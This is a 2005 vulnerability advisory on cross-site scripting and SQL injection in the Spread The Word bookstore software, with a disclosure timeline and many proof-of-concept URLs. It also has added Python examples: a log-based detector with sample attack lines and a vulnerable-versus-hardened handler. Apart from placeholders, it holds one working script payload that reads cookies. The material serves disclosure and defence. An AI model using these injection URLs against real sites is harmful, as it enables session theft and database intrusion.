Spread The Word multiple XSS and SQL injections

Tuesday, May 24, 2005
####################################################
Spread The Word (Comersus-based bookstore): multiple
script and variable XSS and SQL injection vulnerabilities.
vendor url: http://www.stwm.com/opportunity.asp
advisory url: http://lostmon.blogspot.com/2005/05/spread-word-multiple-xss-and-sql.html
vendor notified: yes   exploit available: yes
BID: 13733 and 13737
####################################################

Spread The Word (Comersus-based bookstore) contains a flaw that
allows a remote cross-site scripting attack. The flaw exists because
the application does not validate multiple variables submitted to
multiple scripts. A user could therefore craft a URL that executes
arbitrary script code in another user's browser within the trust
relationship between the browser and the server, leading to a loss
of integrity. The same unvalidated variables also reach SQL queries,
producing SQL errors and path disclosure.
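As an added example, not part of the original advisory: a defender looking for the crafted URLs described above can check IIS W3C extended logs for the scripts and parameters named in the proof of concepts below. The script list, the split into numeric and free-text parameters, the function names and the sample log lines are all constructed for this example; a 500 response on a flagged request corresponds to the SQL errors and path disclosure the advisory reports.

```python
import re
from urllib.parse import parse_qsl

# Scripts named in the advisory (lower-cased file names; some installs prefix them with STW).
AFFECTED_SCRIPTS = {
    "browsecategories.asp", "search.asp", "advancedsearch.asp", "viewitem.asp",
    "showcontent.asp", "stwshowcontent.asp", "myside.asp", "browsemain.asp",
    "newcustomer.asp", "login.asp",
}
# Parameters the store only ever uses as integers (category ids, page ids, price bounds).
NUMERIC_PARAMS = {
    "cat0", "cat1", "searchtype", "searchcat1", "searchcat2",
    "idrightpage", "curhigh", "pricemin", "pricemax", "publicationdate",
}
# Free-text parameters that the pages reflect back into HTML.
TEXT_PARAMS = {"strsearch", "cat0literal", "cat1literal", "redirecturl", "author", "newemail"}

INT_RE = re.compile(r"^-?\d*$")                    # empty is allowed: "PriceMin=" is normal traffic
ISBN_RE = re.compile(r"^(\d{9}[\dXx]|\d{13})?$")   # ISBN-10 (optional X check digit) or ISBN-13
MARKUP_RE = re.compile(r"[<>\"']|javascript:", re.IGNORECASE)


def classify_request(stem, query):
    """Return the reasons a request matches the advisory's injection patterns (empty if clean)."""
    reasons = []
    script = stem.rsplit("/", 1)[-1].lower()
    if script not in AFFECTED_SCRIPTS or query in ("", "-"):
        return reasons
    # parse_qsl percent-decodes once; IIS logs cs-uri-query as received from the client.
    for name, value in parse_qsl(query, keep_blank_values=True):
        key = name.lower()
        if key == "isbn" and not ISBN_RE.match(value):
            reasons.append("non-ISBN value in %s: %r" % (name, value))
        elif key in NUMERIC_PARAMS and not INT_RE.match(value):
            reasons.append("non-numeric value in %s: %r" % (name, value))
        elif key in TEXT_PARAMS and MARKUP_RE.search(value):
            reasons.append("markup in %s: %r" % (name, value))
    return reasons


def scan_iis_log(lines):
    """Scan IIS W3C extended log lines; return (line_no, client_ip, status, reasons) per hit."""
    fields = None
    hits = []
    for line_no, line in enumerate(lines, 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if fields is None or not line.strip() or line.startswith("#"):
            continue
        row = dict(zip(fields, line.split()))
        reasons = classify_request(row.get("cs-uri-stem", ""), row.get("cs-uri-query", "-"))
        if reasons:
            # A 500 on the same request is the "SQL errors and path disclosure" the advisory describes.
            hits.append((line_no, row.get("c-ip"), row.get("sc-status"), reasons))
    return hits


# Constructed sample log in W3C extended format: lines 4, 5 and 7 carry the
# advisory's patterns, the rest is ordinary storefront traffic.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-05-24 10:01:02 192.0.2.10 GET /store/BrowseCategories.asp Cat0=783&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible 200
2005-05-24 10:01:05 192.0.2.10 GET /store/BrowseCategories.asp Cat0=783'&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible 500
2005-05-24 10:01:09 192.0.2.10 GET /store/BrowseMain.asp Cat0=783&Cat0Literal=Gifts&CurHigh=3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 200
2005-05-24 10:02:00 198.51.100.7 GET /store/Search.asp InStock=&SearchType=783&strSearch=bible&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1 200
2005-05-24 10:02:31 198.51.100.7 GET /store/Search.asp InStock=&SearchType=783&strSearch=%3Cb%3Ebible%3C/b%3E&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1 200
2005-05-24 10:03:00 203.0.113.5 GET /store/default.asp - 200
""".splitlines()

if __name__ == "__main__":
    for line_no, ip, status, reasons in scan_iis_log(SAMPLE_LOG):
        print("line %d  %s  status %s  %s" % (line_no, ip, status, "; ".join(reasons)))
```

The check is deliberately structural rather than signature based: a category id that is not an integer, or markup characters in a display label, is anomalous for this application whatever payload follows, so the rules still fire on encodings the proof of concepts do not show. Double-encoded values are decoded only once here; a production rule set would decode until stable.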


##############
versions:
##############

I can't establish which versions are affected.

##############
solution:
##############

No solution was available at this time.

##############
timeline
##############

discovered: 17 Oct 2004
vendor notified: 08 April 2005
vendor response: 11 April 2005
disclosure: 24 May 2005



####################
proof of concepts:
####################

Some installations prefix file names with STW; e.g. 'ShowContent.asp'
is 'STWShowContent.asp' in other stores.

#####################
BrowseCategories.asp
#####################

XSS, SQL errors and path disclosure.

http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here]

http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783[XSS-here]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible

Cat0Literal can be Books, Videos, Gifts, Bibles or any of the similar categories listed in the cart.

#############
search.asp
#############

XSS, SQL errors and path disclosure.

http://[target]/store/Search.asp?SearchType=565[SQL-INJECTION]&strSearch=lalala

http://[target]/store/Search.asp?InStock=[XSS-here]&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=[XSS-here]&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=[XSS-here]&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate='

##################
AdvancedSearch.asp
##################

http://[target]/store/AdvancedSearch.asp?strSearch=[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=111111111&B1=Submit


##################
ViewItem.asp
##################

XSS, SQL errors and path disclosure.

http://[target]/store/ViewItem.asp?ISBN=0789906651[XSS-here]&Cat0=565

http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[XSS-here]

http://[target]/store/ViewItem.asp?ISBN=0789906651[SQL-INJECTION]&Cat0=565

http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[SQL-INJECTION]



###################
STWShowContent.asp
###################

XSS, SQL errors and path disclosure.

http://[target]/store/STWShowContent.asp?idRightPage=13032[XSS-CODE]

http://[target]/store/STWShowContent.asp?idRightPage=13032[SQL-INJECTION]

http://[target]/store/STWShowContent.asp

###################
MySide.Asp
###################
XSS, SQL errors and path disclosure.

http://[target]/store/MySide.Asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]

http://[target]/store/MySide.Asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles

#################
BrowseMain.asp
#################
XSS, SQL errors and path disclosure.

http://[target]/store/BrowseMain.asp?Cat0=565[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=783&Cat0Literal=Gifts&CurHigh=3"><script>alert(document.cookie)</script>

################
others
################
XSS

http://[target]/store/NewCustomer.asp?newemail=zzzz@lalala.es&RedirectURL=[XSS-CODE]

http://[target]/store/Login.asp?RedirectURL=[XSS-code]

It is also possible to inject SQL or XSS code through the 'Cat0' or
'Cat1' variable in every file where these variables are used.

It is also possible to inject XSS code through the 'Cat0Literal' or
'Cat1Literal' variable in every file where these variables are used.
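As an added illustration of the two variable classes summarised above, and not the store's own ASP source (which is not on the page): a Python/sqlite3 model of a BrowseCategories-style handler. The vulnerable form concatenates `Cat0` into the SQL statement and echoes `Cat0Literal` into the HTML, so a malformed id surfaces as a database error and a label containing markup is rendered as markup. The hardened form validates `Cat0` as an integer, binds it as a query parameter, escapes the label, and answers bad input with a generic message instead of the error text. The table, its rows and the function names are constructed.

```python
import html
import re
import sqlite3


def make_store():
    """Constructed in-memory stand-in for the store's category table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO categories VALUES (?, ?)",
                     [(565, "Bibles"), (783, "Gifts"), (839, "Bible")])
    return conn


def browse_vulnerable(conn, cat0, cat0_literal):
    """Model of the flawed pattern: Cat0 concatenated into SQL, Cat0Literal echoed into HTML.

    Returns (status, body). A malformed Cat0 becomes a database error; an unhandled
    ASP error page would print that message together with the script's path.
    """
    try:
        rows = conn.execute("SELECT name FROM categories WHERE id = " + cat0).fetchall()
    except sqlite3.Error as exc:
        return 500, "<pre>Database error: %s</pre>" % exc
    items = "".join("<li>%s</li>" % name for (name,) in rows)
    return 200, "<h1>%s</h1><ul>%s</ul>" % (cat0_literal, items)


CAT_ID_RE = re.compile(r"-?\d{1,9}")   # category ids are small integers, nothing else


def browse_hardened(conn, cat0, cat0_literal):
    """Same page with request values validated, bound and escaped.

    Returns (status, body) and never lets a database error reach the client.
    """
    if not CAT_ID_RE.fullmatch(cat0):
        return 400, "<p>Invalid category.</p>"
    rows = conn.execute("SELECT name FROM categories WHERE id = ?", (int(cat0),)).fetchall()
    if not rows:
        return 404, "<p>Unknown category.</p>"
    # Cat0Literal is only a display label; escaping keeps it inside the <h1> text node.
    heading = html.escape(cat0_literal, quote=True)
    items = "".join("<li>%s</li>" % html.escape(name) for (name,) in rows)
    return 200, "<h1>%s</h1><ul>%s</ul>" % (heading, items)


if __name__ == "__main__":
    db = make_store()
    print(browse_vulnerable(db, "783'", "Gifts"))        # 500 with the database error text
    print(browse_vulnerable(db, "783", "<b>Gifts</b>"))  # label reflected as markup
    print(browse_hardened(db, "783'", "Gifts"))          # 400, no error text
    print(browse_hardened(db, "783", "<b>Gifts</b>"))    # label escaped
```

Two points carry over to the classic ASP original regardless of language: the integer check on `Cat0`/`Cat1` must happen before the value touches the query (in ADO that means a parameterised Command rather than string building), and the literal should be treated purely as output text. Better still is to drop `Cat0Literal` from the URL entirely and look the name up by id, since the database already knows it.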

################### End ################

Thnx to Estrella for being my light
Thnx to Icaro, he is my Shadow!!!
Thnx to all the http://www.osvdb.org team
Thnx to all who day after day support me!!!
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
Curiosity is what moves the mind
 
